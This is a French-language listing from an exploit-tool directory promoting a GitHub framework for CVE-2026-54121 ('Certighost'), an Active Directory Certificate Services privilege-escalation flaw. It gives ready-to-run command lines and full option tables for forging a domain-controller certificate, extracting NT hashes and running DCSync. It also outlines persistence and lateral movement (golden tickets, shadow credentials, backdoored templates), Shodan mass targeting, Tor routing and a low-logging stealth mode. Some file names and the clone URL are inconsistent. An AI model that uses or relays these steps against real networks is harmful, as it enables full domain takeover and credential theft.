Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-54121-PoC-Exploit — 👻 CVE-2026-54121 - Best CertiGhost AD CS Multi-Exploit Framework | Boîte à outils avancée avec serveurs DC/LDAP non autorisés, abus de certificats, extraction de hachages PKINIT. Fonctionnalités : vérification de sécurité, exploitation complète multi-thread. 🛡️ CVSS 8.8 High - Utilisez de manière éthique, restez dans la légalité. 🔒 | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-54121-poc-exploit
Authentification et AutorisationFrameworks de Tests d'IntrusionEscalade de PrivilègesFrameworks d'ExploitationExploitationMouvement LatéralPost-ExploitationDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
tc4dy/cve-2026-54121-poc-exploit

CVE-2026-54121-PoC-Exploit

Voir le dépôt
276il y a 25 joursPas encore vérifié

À propos

👻 CVE-2026-54121 - Best CertiGhost AD CS Multi-Exploit Framework | Boîte à outils avancée avec serveurs DC/LDAP non autorisés, abus de certificats, extraction de hachages PKINIT. Fonctionnalités : vérification de sécurité, exploitation complète multi-thread. 🛡️ CVSS 8.8 High - Utilisez de manière éthique, restez dans la légalité. 🔒

Partager

CVE-2026-54121

CVE-2026-54121 - AD CS « Certighost » - Framework et boîte à outils d'élévation de privilèges

CVE-2026-54121 CVSS 8.8 Python 3.6+

Privilege Escalation Identity Impersonation Domain Admin

Active Directory Certificate Services — Certighost → Prise de contrôle du domaine

Framework d'exploitation et boîte à outils d'audit
Pour tests de sécurité autorisés uniquement.

---

⚖️ Avis de non-responsabilité légal et utilisation responsable

Cet outil est fourni uniquement à des fins éducatives et de tests d'intrusion autorisés. Les auteurs et contributeurs ne sont pas responsables de toute mauvaise utilisation ou de tout dommage causé par ce logiciel. Les utilisateurs sont seuls responsables de l'obtention d'une autorisation écrite explicite du propriétaire de la cible avant tout test. L'accès non autorisé à des systèmes informatiques est illégal en vertu des lois fédérales, étatiques et internationales applicables en matière de cybercriminalité. En utilisant ce logiciel, vous acceptez :

  • L'utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
  • Respecter toutes les lois locales, étatiques et fédérales applicables.
  • Ne pas l'utiliser pour des activités malveillantes, destructrices ou illégales.

⚠️ AVERTISSEMENT : Les vulnérabilités d'élévation de privilèges d'Active Directory présentent un risque élevé pour les infrastructures d'entreprise. Les tests non autorisés sont strictement interdits.


[+!] Aperçu de la vulnérabilité

CVE-2026-54121 (surnommée « Certighost ») est une vulnérabilité d'élévation de privilèges (EoP) dans les services de certificats Active Directory (AD CS) de Microsoft. Elle permet à des utilisateurs de domaine à faibles privilèges d'usurper des comptes de machines contrôleurs de domaine et d'obtenir une prise de contrôle totale de Domain Admin via la falsification de certificats.

Comment cela fonctionne :

  1. Contournement de la validation de la cible : La vulnérabilité existe en raison de contrôles d'autorisation inappropriés (CWE-285) dans AD CS lors du traitement des paramètres de cible des demandes de certificat.
  2. Redirection vers un serveur rogue : L'autorité de certification (CA) accepte des cibles de redirection de serveur fournies par le client sans vérifier si la cible est un contrôleur de domaine autorisé.
  3. Usurpation du contrôleur de domaine : L'autorité de certification interroge le serveur contrôlé par l'attaquant et émet un certificat machine valide signé sous l'identité d'un contrôleur de domaine privilégié.
  4. Prise de contrôle du domaine (DCSync) : En utilisant le certificat de contrôleur de domaine forgé, l'attaquant s'authentifie via Kerberos/PKINIT pour obtenir des privilèges de contrôleur de domaine et exécuter des opérations DCSync.

Informations clés :

Avertissement ! 🌬️

Ce code a été écrit dans un souci de convivialité et est entièrement fonctionnel, en privilégiant la sécurité, la confidentialité et une journalisation minimale. Il est recommandé de supprimer complètement l'intégration et la bibliothèque Shodan, d'utiliser un thread unique au lieu d'un pool de threads, de supprimer l'analyse de ports et detect_ip, et de désactiver la journalisation et les sorties. Utilisez « stealthcert.py » pour cette version.

CVE-2026-54121 CertiGhost - Référence des paramètres


📋 Liste complète des paramètres

Paramètres de l'exploit Python


stealthcare.py (Exploitation sûre)


Paramètres du wrapper PowerShell

🚀 Exemples d'utilisation

root@kitploit:~
git clone https://tc4dy/CVE-2026-54121-PoC-Exploit
#install requirements

Exemples ❄️

root@kitploit:~
# Auto-discovers CA via LDAP, creates temp computer, spawns rogue servers, requests certificate with cdc redirect, extracts DC's NT hash via PKINIT, enables DCSync for domain takeover
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10

# Impersonates a specific Domain Controller (DC01$). Useful when you know exactly which DC to target. Bypasses auto-discovery
python3 certighost.py -d corp.local -u user -p Passw0rd --dc-ip 10.0.0.1 --target-san DC01$

# Uses NTLM hash instead of password. Works when password is unknown but hash is obtained. ':' before hash = empty LM hash
python3 certighost.py -d domain.local -u admin --hashes :8846f7eaee8fb117ad06bdd830b7586c --dc-ip 192.168.1.10

# Bypasses LDAP CA discovery. Uses explicitly provided CA IP and name. Useful when LDAP is restricted or CA is on different subnet
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10 --ca-ip 192.168.1.20 --ca "PLAYGROUND-CA"

PowerShell (Détection)

root@kitploit:~
# Native LDAP query to check if AD CS is present. Returns CA name and DNS. Read-only, safe for production. No exploitation performed
.\CertiGhost.ps1 -d playground.local --dc-ip 192.168.1.10 --username lowpriv -p Password123 --detect

Backend Python (Exploitation)

root@kitploit:~
# Runs native AD CS detection then calls Python certighost.py with all parameters. Requires certighost.py in same directory. Prints NT hash and ccache file
.\CertiGhost.ps1 -d corp.local --dc-ip 10.0.0.1 --username attacker -p P@ssw0rd --exploit --target-account DC01$

Enregistrer au format JSON, mode Détection

root@kitploit:~
#Detection only mode. Saves results in JSON format. Useful for automation, reporting, and integration with other security tools
.\CertiGhost.ps1 -d domain.local --dc-ip 192.168.1.10 --username user -p pass --detect -o results.json

🧠 Plongée technique approfondie

1. Contournement de la validation de cible AD CS (Certighost)

La vulnérabilité provient de contrôles d'autorisation et de validation inappropriés (CWE-285) au sein des services de certificats Active Directory (AD CS) lors des processus d'inscription de certificats. Un attaquant disposant d'identifiants de domaine à faibles privilèges peut manipuler les paramètres de redirection de cible pour amener l'autorité de certification (CA) à vérifier des assertions d'identité auprès d'un point de terminaison rogue.

Point de terminaison vulnérable / Contexte de la requête :

root@kitploit:~
POST /certsrv/mscep/mscep.dll HTTP/1.1
Host: ca-server.domain.local
Content-Type: application/x-www-form-urlencoded

... (Certificate Request payload with manipulated target/cdc parameters)

2. Vecteurs d'attaque

  • Manipulation de la cible poursuivie (Chase Target) : Un attaquant modifie les paramètres de redirection de cible (tels que cdc / chase target) dans la demande de certificat, forçant l'autorité de certification (CA) à router le trafic de vérification vers un point de terminaison spécifié.

  • Redirection vers un serveur rogue : L'autorité de certification (CA) initie des connexions LDAP ou SMB vers la destination fournie par le client sans valider si la cible est un contrôleur de domaine légitime et autorisé.

  • Falsification de l'identité du contrôleur de domaine et émission de certificat : Le serveur rogue contrôlé par l'attaquant répond aux requêtes de vérification émises par la CA au nom du compte de contrôleur de domaine ciblé. Sur la base de cette réponse, la CA émet un certificat valide et signé portant l'identité du contrôleur de domaine.


3. Post-exploitation

Récupération du Ticket Granting Ticket (TGT)

À l'aide du certificat de contrôleur de domaine obtenu, une authentification Kerberos est effectuée via PKINIT (Public Key Cryptography for Initial Authentication) pour récupérer un TGT à hauts privilèges.

Attaque DCSync

Avec un ticket Kerberos possédant des privilèges de contrôleur de domaine, les hashs de mots de passe de tous les comptes de la base de données Active Directory (p. ex., krbtgt, Administrator) sont extraits à l'aide de la technique DCSync.

Persistance

  • Création de Golden Ticket : Les TGT sont forgés à la demande en utilisant le hash du mot de passe du compte krbtgt extrait.
  • Shadow Credentials : Des clés de certificat non autorisées sont ajoutées à l'attribut msDS-KeyCredentialLink des comptes ciblés pour garantir un accès persistant.
  • Manipulation des modèles de certificats : Les permissions des modèles AD CS sont modifiées pour conserver des configurations backdoor permettant une future élévation de privilèges.

Mouvement latéral

  • Domination du domaine : Des sessions entièrement privilégiées (SYSTEM / Domain Admin) sont établies sur tous les serveurs et postes de travail du domaine.
  • Pivotement entre forêts : L'accès aux domaines approuvants (Forest Trust) est réalisé à l'aide des techniques de SID History ou de délégation de TGT.

📚 Références

  • NVD - CVE-2026-54121
  • Microsoft Security Update Guide - CVE-2026-54121
  • Note de vulnérabilité CERT/CC
  • MITRE ATT&CK - T1649 : Vol ou falsification de certificats d'authentification

🔗 Autres exploits

  • CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
  • CVE-2026-6875 - ServiceNow Pre-Auth RCE Exploit Framework
  • CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
  • CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
  • CVE-2026-41940 - cPanel/WHM Authentication Bypass
Télécharger l’outil
AttributValeur
📅 Découverte / CorrectifJuillet 2026 (Patch Tuesday de Microsoft)
⚠️ Score CVSS8.8 (ÉLEVÉ)
🏷️ Nom de codeCertighost
🎯 Produits affectésMicrosoft Active Directory Certificate Services
🔄 Versions corrigéesMise à jour de sécurité de juillet 2026
🔓 AuthentificationCompte de domaine à faibles privilèges
🌍 ImpactCompromission totale du domaine Active Directory
ParamètreDescriptionExemple
-d, --domainNom DNS du domaine cible (obligatoire)-d playground.local
-u, --usernameUtilisateur de domaine à faibles privilèges (obligatoire)-u lowpriv
-p, --passwordMot de passe de l'utilisateur-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--dc-ipIP du contrôleur de domaine (obligatoire)--dc-ip 192.168.1.10
--ca-ipIP de l'autorité de certification (facultatif)--ca-ip 192.168.1.20
--caNom de la CA (auto-découvert si non défini)--ca "PLAYGROUND-CA"
--listenerIP de l'attaquant pour les serveurs rogue--listener 192.168.1.100
--target-sanCompte machine à usurper (p. ex. DC01$)--target-san DC01$
--templateModèle de certificat (défaut : Machine)--template Machine
--computer-nameNom du compte machine existant (avec $)--computer-name GHOSTABCD$
--computer-passMot de passe du compte machine existant--computer-pass CGabc123...
--computer-hashHash NT du compte machine existant--computer-hash 8846f7ea...
--use-ldapUtiliser LDAP (389) au lieu de LDAPS (636)--use-ldap
--exploitEffectuer l'exploitation--exploit
--detectDétection uniquement (sans exploitation)--detect
-t, --threadsNombre maximal de threads pour l'analyse de masse-t 10
--timeoutDélai d'expiration par requête (secondes)--timeout 10
--retryNombre de nouvelles tentatives en cas d'échec--retry 3
--delayDélai de base entre les requêtes--delay 1.0
--proxyURL du proxy--proxy http://127.0.0.1:8080
--no-verifyDésactiver la vérification SSL--no-verify
--torUtiliser le proxy Tor (socks5h://127.0.0.1:9050)--tor
-o, --outputFichier de sortie (.json, .csv, .jsonl)-o results.json
-v, --verboseSortie détaillée-v
-q, --quietMode silencieux-q
-h, --helpAfficher l'aide-h
ParamètreDescriptionExemple
-t, --targetIP ou nom d'hôte de la CA cible (obligatoire)-t 192.168.1.20
-d, --domainNom DNS du domaine cible (obligatoire)-d playground.local
--dc-ipIP du contrôleur de domaine (obligatoire)--dc-ip 192.168.1.10
-u, --usernameUtilisateur de domaine à faibles privilèges (obligatoire)-u lowpriv
-p, --passwordMot de passe de l'utilisateur-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--computer-nameNom du compte machine existant (avec $)--computer-name GHOSTABCD$
--computer-passMot de passe du compte machine existant--computer-pass CGabc123...
--computer-hashHash NT du compte machine existant--computer-hash 8846f7ea...
--target-accountCompte à usurper (p. ex. DC01$)--target-account DC01$
--templateModèle de certificat (défaut : Machine)--template Machine
--listenerIP de l'attaquant pour les serveurs rogue (auto-détection si non défini)--listener 192.168.1.100
--use-ldapUtiliser LDAP (389) au lieu de LDAPS (636)--use-ldap
--keep-filesConserver les fichiers .pfx et .ccache (défaut : suppression)--keep-files
-h, --helpAfficher l'aide-h
ParamètreDescriptionExemple
-u, --urlIP ou nom d'hôte de la CA cible-u 192.168.1.20
-l, --listFichier contenant les cibles (une par ligne)-l targets.txt
--shodanCharger les cibles depuis Shodan--shodan
--shodan-queryRequête de recherche Shodan--shodan-query "AD CS Certificate"
-d, --domainNom DNS du domaine cible (obligatoire)-d playground.local
--dc-ipIP du contrôleur de domaine (obligatoire)--dc-ip 192.168.1.10
--usernameUtilisateur de domaine à faibles privilèges (obligatoire)--username lowpriv
-p, --passwordMot de passe de l'utilisateur-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7ea...
--computer-nameNom du compte machine existant (avec $)--computer-name GHOSTABCD$
--computer-passMot de passe du compte machine existant--computer-pass CGabc123...
--computer-hashHash NT du compte machine existant--computer-hash 8846f7ea...
--target-accountCompte à usurper (p. ex. DC01$)--target-account DC01$
--templateModèle de certificat (défaut : Machine)--template Machine
--listenerIP de l'attaquant pour les serveurs rogue--listener 192.168.1.100
--use-ldapUtiliser LDAP (389) au lieu de LDAPS (636)--use-ldap
--exploitEffectuer l'exploitation--exploit
--detectDétection uniquement (sans exploitation)--detect
-t, --threadsNombre maximal de threads pour l'analyse de masse-t 10
--timeoutDélai d'expiration par requête (secondes)--timeout 10
--retryNombre de nouvelles tentatives en cas d'échec--retry 3
--delayDélai de base entre les requêtes--delay 1.0
--proxyURL du proxy--proxy http://127.0.0.1:8080
--no-verifyDésactiver la vérification SSL--no-verify
--torUtiliser le proxy Tor--tor
-o, --outputFichier de sortie (.json, .csv, .jsonl)-o results.json
-v, --verboseSortie détaillée-v
-q, --quietMode silencieux-q
-h, --helpAfficher l'aide-h